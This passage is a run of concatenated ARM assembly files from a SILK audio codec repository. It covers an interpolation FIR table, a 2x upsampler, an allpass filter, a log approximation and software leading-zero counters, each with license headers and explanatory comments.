OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
EXPORT SYM(SKP_Silk_resampler_frac_FIR_144_alt)
/*DATA*/
/*
 * Fractional-delay interpolation FIR table: 144 phases x 6 int16 taps,
 * emitted as halfwords (DCW).  Row k holds the 6-tap filter for fractional
 * phase k/144; the table is time-symmetric (row k is the reverse of row
 * 143-k -- e.g. the first and last rows mirror each other), as expected for
 * a linear-phase interpolator.
 * NOTE(review): presumably consumed by the fractional resampler inner loop
 * (SKP_Silk_resampler_private_*), indexed by interpolation phase -- confirm
 * the "2" argument to SKP_TABLE (element-size/alignment parameter) against
 * SKP_Silk_AsmPreproc.h before reusing this macro elsewhere.
 */
ALIGN 4
SKP_TABLE SKP_Silk_resampler_frac_FIR_144_alt, 2
DCW -647, 1884, 30078, 2207, -851, 73, \
	-625, 1736, 30044, 2409, -901, 81, \
	-603, 1591, 30005, 2614, -952, 89, \
	-581, 1448, 29963, 2820, -1003, 97, \
	-559, 1308, 29917, 3028, -1054, 105, \
	-537, 1169, 29867, 3238, -1105, 113, \
	-515, 1032, 29813, 3450, -1156, 121, \
	-494, 898, 29755, 3664, -1207, 129, \
	-473, 766, 29693, 3880, -1258, 137, \
	-452, 636, 29627, 4098, -1309, 145
DCW -431, 508, 29558, 4317, -1359, 152, \
	-410, 383, 29484, 4538, -1410, 160, \
	-390, 260, 29407, 4761, -1460, 168, \
	-369, 139, 29327, 4986, -1511, 175, \
	-349, 20, 29242, 5212, -1561, 183, \
	-330, -97, 29154, 5439, -1611, 190, \
	-310, -211, 29062, 5668, -1660, 197, \
	-291, -324, 28967, 5899, -1709, 204, \
	-271, -434, 28868, 6131, -1758, 212, \
	-253, -542, 28765, 6364, -1807, 219
DCW -234, -647, 28659, 6599, -1856, 226, \
	-215, -751, 28550, 6835, -1904, 232, \
	-197, -852, 28436, 7072, -1951, 239, \
	-179, -951, 28320, 7311, -1998, 246, \
	-162, -1048, 28200, 7550, -2045, 252, \
	-144, -1143, 28077, 7791, -2091, 259, \
	-127, -1235, 27950, 8032, -2137, 265, \
	-110, -1326, 27820, 8275, -2182, 271, \
	-94, -1414, 27687, 8519, -2227, 277, \
	-77, -1500, 27550, 8763, -2271, 283
DCW -61, -1584, 27410, 9009, -2315, 289, \
	-45, -1665, 27268, 9255, -2358, 294, \
	-30, -1745, 27122, 9502, -2400, 300, \
	-15, -1822, 26972, 9750, -2442, 305, \
	0, -1897, 26820, 9998, -2482, 310, \
	15, -1970, 26665, 10247, -2523, 315, \
	29, -2041, 26507, 10497, -2562, 320, \
	44, -2110, 26346, 10747, -2601, 324, \
	57, -2177, 26182, 10997, -2639, 328, \
	71, -2242, 26015, 11248, -2676, 333
DCW 84, -2305, 25845, 11500, -2712, 337, \
	97, -2365, 25673, 11751, -2747, 341, \
	110, -2424, 25498, 12003, -2782, 344, \
	122, -2480, 25320, 12255, -2815, 348, \
	134, -2534, 25140, 12508, -2848, 351, \
	146, -2587, 24956, 12760, -2880, 354, \
	157, -2637, 24771, 13012, -2910, 357, \
	168, -2685, 24583, 13265, -2940, 359, \
	179, -2732, 24392, 13517, -2968, 362, \
	190, -2776, 24199, 13770, -2996, 364
DCW 200, -2819, 24003, 14022, -3022, 366, \
	210, -2859, 23805, 14274, -3048, 368, \
	220, -2898, 23605, 14526, -3072, 369, \
	229, -2934, 23403, 14777, -3095, 370, \
	238, -2969, 23198, 15028, -3117, 371, \
	247, -3002, 22992, 15279, -3138, 372, \
	255, -3033, 22783, 15529, -3157, 373, \
	263, -3062, 22572, 15779, -3175, 373, \
	271, -3089, 22359, 16028, -3192, 373, \
	279, -3114, 22144, 16277, -3208, 373
DCW 286, -3138, 21927, 16525, -3222, 372, \
	293, -3160, 21709, 16772, -3235, 372, \
	300, -3180, 21488, 17018, -3247, 371, \
	306, -3198, 21266, 17264, -3257, 369, \
	312, -3215, 21042, 17509, -3266, 368, \
	318, -3229, 20816, 17753, -3273, 366, \
	323, -3242, 20589, 17996, -3279, 364, \
	328, -3254, 20360, 18238, -3283, 362, \
	333, -3263, 20130, 18478, -3286, 359, \
	338, -3272, 19898, 18718, -3288, 356
DCW 342, -3278, 19665, 18957, -3288, 353, \
	346, -3283, 19430, 19194, -3286, 350, \
	350, -3286, 19194, 19430, -3283, 346, \
	353, -3288, 18957, 19665, -3278, 342, \
	356, -3288, 18718, 19898, -3272, 338, \
	359, -3286, 18478, 20130, -3263, 333, \
	362, -3283, 18238, 20360, -3254, 328, \
	364, -3279, 17996, 20589, -3242, 323, \
	366, -3273, 17753, 20816, -3229, 318, \
	368, -3266, 17509, 21042, -3215, 312
DCW 369, -3257, 17264, 21266, -3198, 306, \
	371, -3247, 17018, 21488, -3180, 300, \
	372, -3235, 16772, 21709, -3160, 293, \
	372, -3222, 16525, 21927, -3138, 286, \
	373, -3208, 16277, 22144, -3114, 279, \
	373, -3192, 16028, 22359, -3089, 271, \
	373, -3175, 15779, 22572, -3062, 263, \
	373, -3157, 15529, 22783, -3033, 255, \
	372, -3138, 15279, 22992, -3002, 247, \
	371, -3117, 15028, 23198, -2969, 238
DCW 370, -3095, 14777, 23403, -2934, 229, \
	369, -3072, 14526, 23605, -2898, 220, \
	368, -3048, 14274, 23805, -2859, 210, \
	366, -3022, 14022, 24003, -2819, 200, \
	364, -2996, 13770, 24199, -2776, 190, \
	362, -2968, 13517, 24392, -2732, 179, \
	359, -2940, 13265, 24583, -2685, 168, \
	357, -2910, 13012, 24771, -2637, 157, \
	354, -2880, 12760, 24956, -2587, 146, \
	351, -2848, 12508, 25140, -2534, 134
DCW 348, -2815, 12255, 25320, -2480, 122, \
	344, -2782, 12003, 25498, -2424, 110, \
	341, -2747, 11751, 25673, -2365, 97, \
	337, -2712, 11500, 25845, -2305, 84, \
	333, -2676, 11248, 26015, -2242, 71, \
	328, -2639, 10997, 26182, -2177, 57, \
	324, -2601, 10747, 26346, -2110, 44, \
	320, -2562, 10497, 26507, -2041, 29, \
	315, -2523, 10247, 26665, -1970, 15, \
	310, -2482, 9998, 26820, -1897, 0
DCW 305, -2442, 9750, 26972, -1822, -15, \
	300, -2400, 9502, 27122, -1745, -30, \
	294, -2358, 9255, 27268, -1665, -45, \
	289, -2315, 9009, 27410, -1584, -61, \
	283, -2271, 8763, 27550, -1500, -77, \
	277, -2227, 8519, 27687, -1414, -94, \
	271, -2182, 8275, 27820, -1326, -110, \
	265, -2137, 8032, 27950, -1235, -127, \
	259, -2091, 7791, 28077, -1143, -144, \
	252, -2045, 7550, 28200, -1048, -162
DCW 246, -1998, 7311, 28320, -951, -179, \
	239, -1951, 7072, 28436, -852, -197, \
	232, -1904, 6835, 28550, -751, -215, \
	226, -1856, 6599, 28659, -647, -234, \
	219, -1807, 6364, 28765, -542, -253, \
	212, -1758, 6131, 28868, -434, -271, \
	204, -1709, 5899, 28967, -324, -291, \
	197, -1660, 5668, 29062, -211, -310, \
	190, -1611, 5439, 29154, -97, -330, \
	183, -1561, 5212, 29242, 20, -349
DCW 175, -1511, 4986, 29327, 139, -369, \
	168, -1460, 4761, 29407, 260, -390, \
	160, -1410, 4538, 29484, 383, -410, \
	152, -1359, 4317, 29558, 508, -431, \
	145, -1309, 4098, 29627, 636, -452, \
	137, -1258, 3880, 29693, 766, -473, \
	129, -1207, 3664, 29755, 898, -494, \
	121, -1156, 3450, 29813, 1032, -515, \
	113, -1105, 3238, 29867, 1169, -537, \
	105, -1054, 3028, 29917, 1308, -559
DCW 97, -1003, 2820, 29963, 1448, -581, \
	89, -952, 2614, 30005, 1591, -603, \
	81, -901, 2409, 30044, 1736, -625, \
	73, -851, 2207, 30078, 1884, -647
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 4,293 | silk/src/SKP_Silk_resampler_private_up2_HQ_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
 * SKP_Silk_resampler_private_up2_HQ() -- high-quality 2x upsampler,
 * ARM (EMBEDDED_ARM >= 5).
 *
 * Each int16 input sample yields two int16 outputs.  Per output phase the
 * input runs through a cascade of two first-order allpass sections
 * (states S[0..1] for phase 0, S[2..3] for phase 1) and then a notch
 * filter (shared states S[4..5]); the result is rounded (+256), saturated
 * and arithmetically shifted down by 9 to int16.
 *
 * Arguments:
 *     r0 = S    (int32 state array; S[0..5] read and updated in place)
 *     r1 = out  (int16*, receives 2 * len samples)
 *     r2 = in   (int16*, len samples; len assumed > 0 -- the loop body
 *                always runs at least once)
 *     r3 = len
 *
 * Coefficients live in the PC-relative literal pool at the end of this
 * function as packed 16-bit pairs, consumed with SMLAWB (bottom half) /
 * SMLAWT (top half).
 *
 * NOTE(review): ldmia assigns the lower address to the lower-NUMBERED
 * register regardless of list order, so the IPHONE/non-IPHONE VARDEF
 * aliasing below (S_4/S_5 swapped between r8 and r7) changes which symbolic
 * name actually holds S[4] vs S[5]; the two half-iterations are also
 * written with S_4/S_5 roles swapped relative to each other.  This appears
 * deliberate but is fragile -- verify against the C reference
 * (SKP_Silk_resampler_private_up2_HQ.c) before reordering anything here.
 */
VARDEF S_ptr, r0
VARDEF xy0, r4
VARDEF xy1, r5
VARDEF up2_coefs, r6
#ifdef IPHONE
VARDEF S_0, r8
VARDEF S_1, _r7
VARDEF S_2, r8
VARDEF S_3, _r7
VARDEF S_4, r8
VARDEF S_5, _r7
#else
VARDEF S_0, _r7
VARDEF S_1, r8
VARDEF S_2, _r7
VARDEF S_3, r8
VARDEF S_4, _r7
VARDEF S_5, r8
#endif
VARDEF in, sb
VARDEF out1, sl
VARDEF out2, ip
VARDEF out, lr
.globl SYM(SKP_Silk_resampler_private_up2_HQ)
SYM(SKP_Silk_resampler_private_up2_HQ):
	stmdb sp!, {r4-r10, fp, ip, lr}
	add fp, sp, #36
L(0)
	/* ---- output phase 0: allpass pair on S[0],S[1] ---- */
	ldrsh in, [r2], #2
	ldmia S_ptr, {S_0, S_1}
	ldr up2_coefs, SYM(resampler_up2_hq_0)
	mov in, in, lsl #10			// promote input to Q10
	sub xy0, in, S_0
	smulwb xy0, xy0, up2_coefs		// first allpass section
	add out1, S_0, xy0
	sub xy1, out1, S_1
	smlawt xy1, xy1, up2_coefs, xy1		// second section: coef is (1 + top half)
	add out2, S_1, xy1
	add S_0, in, xy0			// state updates
	add S_1, out1, xy1
	stmia S_ptr, {S_0, S_1}
	add S_ptr, S_ptr, #16 // &S[4]
	ldmia S_ptr, {S_4, S_5}
	ldr xy1, SYM(resampler_up2_hq_notch_2)
	ldr xy0, SYM(resampler_up2_hq_notch_1)
	ldr up2_coefs, SYM(resampler_up2_hq_1)
	sub S_ptr, S_ptr, #8 // &S[2]
	mov out, #256				// rounding constant for the >>9
	/* notch filter on the phase-0 sample (see ldm-ordering NOTE above) */
	smlawb out2, S_5, xy1, out2
	smlawt out2, S_4, xy0, out2
	smlawb out1, S_4, xy0, out2
	smlawt out, out1, xy1, out
	sub S_5, out2, S_5
#if EMBEDDED_ARM<6
	/* manual int16 saturation (after >>9) on cores without SSAT */
	cmp out, #0x1000000
	movge out, #0x1000000
	subge out, out, #1
	cmn out, #0x1000000
	movlt out, #0x1000000
	mov out, out, asr #9
#else
	ssat out, #16, out, asr #9
#endif
	str S_5, [S_ptr, #12] // S[5]
	strh out, [r1], #2			// emit phase-0 output
	/* ---- output phase 1: allpass pair on S[2],S[3] ---- */
	ldmia S_ptr, {S_2, S_3}
	sub xy0, in, S_2
	smulwb xy0, xy0, up2_coefs
	add out1, S_2, xy0
	sub xy1, out1, S_3
	smlawt xy1, xy1, up2_coefs, xy1
	add out2, S_3, xy1
	add S_2, in, xy0
	add S_3, out1, xy1
	stmia S_ptr!, {S_2, S_3}		// S_ptr advances to &S[4]
	ldmia S_ptr, {S_4, S_5}
	ldr xy1, SYM(resampler_up2_hq_notch_2)
	ldr xy0, SYM(resampler_up2_hq_notch_1)
	mov out, #256
	/* notch filter, phase 1 (S_4/S_5 roles swapped vs. phase 0) */
	smlawb out2, S_4, xy1, out2
	smlawt out2, S_5, xy0, out2
	smlawb out1, S_5, xy0, out2
	smlawt out, out1, xy1, out
	sub S_4, out2, S_4
#if EMBEDDED_ARM<6
	cmp out, #0x1000000
	movge out, #0x1000000
	subge out, out, #1
	cmn out, #0x1000000
	movlt out, #0x1000000
	mov out, out, asr #9
#else
	ssat out, #16, out, asr #9
#endif
	subs r3, r3, #1
	str S_4, [S_ptr], #-16 // &S[0]
	strh out, [r1], #2			// emit phase-1 output
	bgt LR(0, b)
	ldmia sp!, {r4-r10, fp, ip, pc}
/* Literal pool: packed 16-bit coefficient pairs (allpass and notch). */
L(SYM(resampler_up2_hq_0))
DCD 0x83BF10B8
L(SYM(resampler_up2_hq_1))
DCD 0xD2FF3FA7
L(SYM(resampler_up2_hq_notch_1))
DCD 0xF1EC1EB8
L(SYM(resampler_up2_hq_notch_2))
DCD 0x6F5C3333
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,588 | silk/src/SKP_Silk_allpass_int_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM >= 5
/*
 * SKP_Silk_allpass_int() -- first-order allpass filter, ARM (EMBEDDED_ARM >= 5).
 *
 * Arguments:
 *     r0        = in   (int32*, input samples)
 *     r1        = S    (int32*, single-word filter state, read/written)
 *     r2        = A    (coefficient; shifted left 17 on entry so its
 *                       significant bits land in the top halfword for SMLAWT)
 *     r3        = out  (int32*, output samples)
 *     [sp,#40]  = len
 *
 * Two loop variants are selected by the sign of the shifted coefficient:
 *     L(0): accumulator base is the input sample   (out = in + Y2*A >> 16)
 *     L(1): accumulator base is the state          (out = S  + Y2*A >> 16)
 * with Y2 = in - S and the state update S = Y2 + out in both.  The two
 * forms presumably implement the positive/negative-A branches of the C
 * reference SKP_Silk_allpass_int() -- confirm there.
 *
 * Both loops process samples in pairs (ldmia of two inputs) with an odd
 * trailing sample handled after the loop; the _WINRT path replaces the
 * conditionally-executed loads/stores with explicit branches.
 *
 * NOTE(review): "bge LR(1, f)" tests N==V, but the preceding
 * "movs A, A, lsl #17" updates only N, Z and C -- V is whatever the caller
 * left it.  If a pure sign test on A is intended, "bpl" would be the
 * flag-safe choice; verify before changing, since upstream ships this form.
 */
VARDEF A, r2
VARDEF len, r4
VARDEF S00, r5
VARDEF ink1, r6
VARDEF ink2, r8
VARDEF Y2, sb
VARDEF outk1, sl
VARDEF outk2, ip
.globl SYM(SKP_Silk_allpass_int)
SYM(SKP_Silk_allpass_int):
	stmdb sp!, {r4-r10, fp, ip, lr}
	add fp, sp, #36
.set len_offset, 40
	ldr len, [sp, #len_offset]
	ldr S00, [r1]				// load filter state
	movs A, A, lsl #17			// align coefficient for SMLAWT; sets N/Z/C
	sub len, len, #1
	ldmia r0!, {ink1,ink2}			// prefetch first input pair
	bge LR(1, f)/*AgeZero*/
L(0)
	/* coefficient-negative variant: accumulate onto the input sample */
	sub Y2, ink1, S00
	smlawt outk1, Y2, A, ink1
	add S00, Y2, outk1			// state update
	subs len, len, #2
	sub Y2, ink2, S00
	smlawt outk2, Y2, A, ink2
#ifdef _WINRT
	ble LR(3, f)
	ldmia r0!, {ink1,ink2}
L(3)
#else
	ldmgtia r0!, {ink1,ink2}		// prefetch next pair only if needed
#endif
	add S00, Y2, outk2
	stmia r3!, {outk1, outk2}
	bgt LR(0, b)
#ifdef _WINRT
	bne LR(2, f)
	/* odd trailing sample */
	ldr ink1, [r0], #4
	sub Y2, ink1, S00
	smlawt outk1, Y2, A, ink1
	add S00, Y2, outk1
	str outk1, [r3]
L(2)
#else
	/* odd trailing sample (conditional on len having been even) */
	ldreq ink1, [r0], #4
	subeq Y2, ink1, S00
	smlawteq outk1, Y2, A, ink1
	addeq S00, Y2, outk1
	streq outk1, [r3]
#endif
	str S00, [r1]				// write back filter state
	ldmia sp!, {r4-r10, fp, ip, pc}
L(1)/*AgeZero:*/
	/* coefficient >= 0 variant: accumulate onto the state */
	sub Y2, ink1, S00
	smlawt outk1, Y2, A, S00
	add S00, Y2, outk1
	subs len, len, #2
	sub Y2, ink2, S00
	smlawt outk2, Y2, A, S00
#ifdef _WINRT
	ble LR(3, f)
	ldmia r0!, {ink1,ink2}
L(3)
#else
	ldmgtia r0!, {ink1,ink2}
#endif
	add S00, Y2, outk2
	stmia r3!, {outk1, outk2}
	bgt LR(1, b)
#ifdef _WINRT
	bne LR(2, f)
	ldr ink1, [r0], #4
	sub Y2, ink1, S00
	smlawt outk1, Y2, A, S00
	add S00, Y2, outk1
	str outk1, [r3]
L(2)
#else
	ldreq ink1, [r0], #4
	subeq Y2, ink1, S00
	smlawteq outk1, Y2, A, S00
	addeq S00, Y2, outk1
	streq outk1, [r3]
#endif
	str S00, [r1]
	ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 3,883 | silk/src/SKP_Silk_lin2log_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/*
 * SKP_Silk_lin2log(r0) -- approximate 128 * log2(r0) in Q7.
 *
 * Method: lz = CLZ(r0); frac_Q7 = the 7 bits below the leading one;
 *   result = (31 - lz) << 7                       (integer part of log2, Q7)
 *          + frac_Q7                              (linear interpolation)
 *          + (frac_Q7 * (128 - frac_Q7) * 179) >> 16   (quadratic correction)
 *
 * Two builds: ARMv5+ uses the clz instruction inline; the ARMv4 variant
 * below calls SKP_Silk_CLZ32 and performs the Q16 multiply-accumulate with
 * SMLAL against 179 << 16 (high word of the 64-bit product equals the
 * (x * 179) >> 16 term).
 * NOTE(review): behavior for r0 == 0 follows from lz == 32 (negative shift
 * count paths) -- callers are presumed to pass positive input; confirm.
 */
VARDEF val_lz, r1
VARDEF val_shift, r2
VARDEF val_frac, r3
VARDEF val_ret1, r1
VARDEF val_128minfrac, r2
VARDEF val_mul_ret, r0
VARDEF val_add_ret, r3
VARDEF const1, r1
.globl SYM(SKP_Silk_lin2log)
SYM(SKP_Silk_lin2log):
	stmdb sp!, {r4-r5, fp, ip, lr}
	add fp, sp, #16
	clz val_lz, r0 /*lz*/
	cmp val_lz, #24
	sub val_shift, val_lz, #24
#ifdef _WINRT
	/* WinRT: branchy form of the conditional normalize-shift below */
	bge LR(0, f)
	rsb val_shift, val_lz, #24
	mov val_frac, r0, asr val_shift
	b LR(1, f)
L(0)
	mov val_frac, r0, lsl val_shift
L(1)
#else
	/* normalize so the 7 fraction bits sit in the low byte */
	rsblt val_shift, val_lz, #24
	movlt val_frac, r0, asr val_shift
	movge val_frac, r0, lsl val_shift
#endif
	and val_frac, val_frac, #0x7F /*frac_Q7*/
	rsb val_ret1, val_lz, #31 /*31-lz*/
	rsb val_128minfrac, val_frac, #128 /*128-frac_Q7*/
	mov val_ret1, val_ret1, lsl #7
	mul val_mul_ret, val_frac, val_128minfrac /*SKP_MUL(frac_Q7, 128 - frac_Q7)*/
	add val_add_ret, val_ret1, val_frac
	mov const1, #179			// quadratic-correction constant (Q16)
	smlawb r0, val_mul_ret, const1, val_add_ret
	ldmia sp!, {r4-r5, fp, ip, pc}
#elif EMBEDDED_ARM>=4
/* ARMv4 build: no clz instruction; count leading zeros in software. */
VARDEF val_lz, r0
VARDEF val_in, r4
VARDEF val_shift, r1
VARDEF val_frac, r2
VARDEF val_ret1, r1
VARDEF val_128minfrac, r3
VARDEF val_mul_ret, r3
VARDEF tmp0, r4
VARDEF const1, r2
VARDEF val_ret, r0
.globl SYM(SKP_Silk_lin2log)
SYM(SKP_Silk_lin2log):
	stmdb sp!, {r4-r5, fp, ip, lr}
	add fp, sp, #16
	mov val_in, r0
	bl SYM(SKP_Silk_CLZ32)			// r0 = leading-zero count of val_in
	cmp val_lz, #24
	sub val_shift, val_lz, #24
	rsblt val_shift, val_lz, #24
	movlt val_frac, val_in, asr val_shift
	movge val_frac, val_in, lsl val_shift
	and val_frac, val_frac, #0x7F /*frac_Q7*/
	rsb val_ret1, val_lz, #31 /*31-lz*/
	rsb val_128minfrac, val_frac, #128 /*128-frac_Q7*/
	mov val_ret1, val_ret1, lsl #7
	mul val_mul_ret, val_frac, val_128minfrac /*SKP_MUL(frac_Q7, 128 - frac_Q7)*/
	add val_ret, val_ret1, val_frac
	mov tmp0, #0
	mov const1, #0xB30000			// 179 << 16: SMLAL high word yields (x*179)>>16
	smlal tmp0, val_ret, val_mul_ret, const1
	ldmia sp!, {r4-r5, fp, ip, pc}
#endif
END
#endif
|
open-vela/external_silk-v3-decoder | 3,256 | silk/src/SKP_Silk_clz_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if (EMBEDDED_ARM>0) && (EMBEDDED_ARM<5)
.globl SYM(SKP_Silk_CLZ16)
.globl SYM(SKP_Silk_CLZ32)
/*
 * SKP_Silk_CLZ16 -- count leading zeros of a 16-bit value.
 * Software fallback for ARM cores without the CLZ instruction (this
 * file is only assembled when 0 < EMBEDDED_ARM < 5; CLZ arrived with
 * ARMv5).  Returns 16 for a zero input.
 * In:       r0 = input value (only the low 16 bits are inspected)
 * Out:      r0 = number of leading zero bits within 16 bits
 * Clobbers: r1, r2, flags.
 */
SYM(SKP_Silk_CLZ16):
str lr, [sp, #-4]!      @ push return address
mov r2, r0              @ r2 = input value
mov r0, #0              @ r0 = leading-zero count accumulator
/* Locate the highest non-zero nibble, adding 4 to the count for every
   all-zero nibble skipped; r1 ends up holding that nibble in bits 3:0. */
ands r1, r2, #0xF000
movne r1, r2, asr #12
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00
movne r1, r2, asr #8
bne 0f
add r0, r0, #4
ands r1, r2, #0xF0
movne r1, r2, asr #4
bne 0f
add r0, r0, #4
mov r1, r2
0:
/* Count leading zero bits inside the nibble in r1, one bit at a time. */
ands r2, r1, #0x8
bne 1f
add r0, r0, #1
ands r2, r1, #0x4
bne 1f
add r0, r0, #1
ands r2, r1, #0x2
bne 1f
add r0, r0, #1
ands r2, r1, #0x1
bne 1f
add r0, r0, #1
1:
ldr pc, [sp], #4        @ pop return address and return
/*
 * SKP_Silk_CLZ32 -- count leading zeros of a 32-bit value.
 * Same nibble-then-bit scan as SKP_Silk_CLZ16, extended to eight
 * nibbles; returns 32 for a zero input.
 * In:       r0 = input value
 * Out:      r0 = number of leading zero bits
 * Clobbers: r1, r2, flags.
 */
SYM(SKP_Silk_CLZ32):
str lr, [sp, #-4]!      @ push return address
mov r2, r0              @ r2 = input value
mov r0, #0              @ r0 = leading-zero count accumulator
/* Locate the highest non-zero nibble, adding 4 to the count for every
   all-zero nibble skipped; r1 ends up holding that nibble in bits 3:0. */
ands r1, r2, #0xF0000000
movne r1, r2, asr #28
bne 0f
add r0, r0, #4
ands r1, r2, #0xF000000
movne r1, r2, asr #24
bne 0f
add r0, r0, #4
ands r1, r2, #0xF00000
movne r1, r2, asr #20
bne 0f
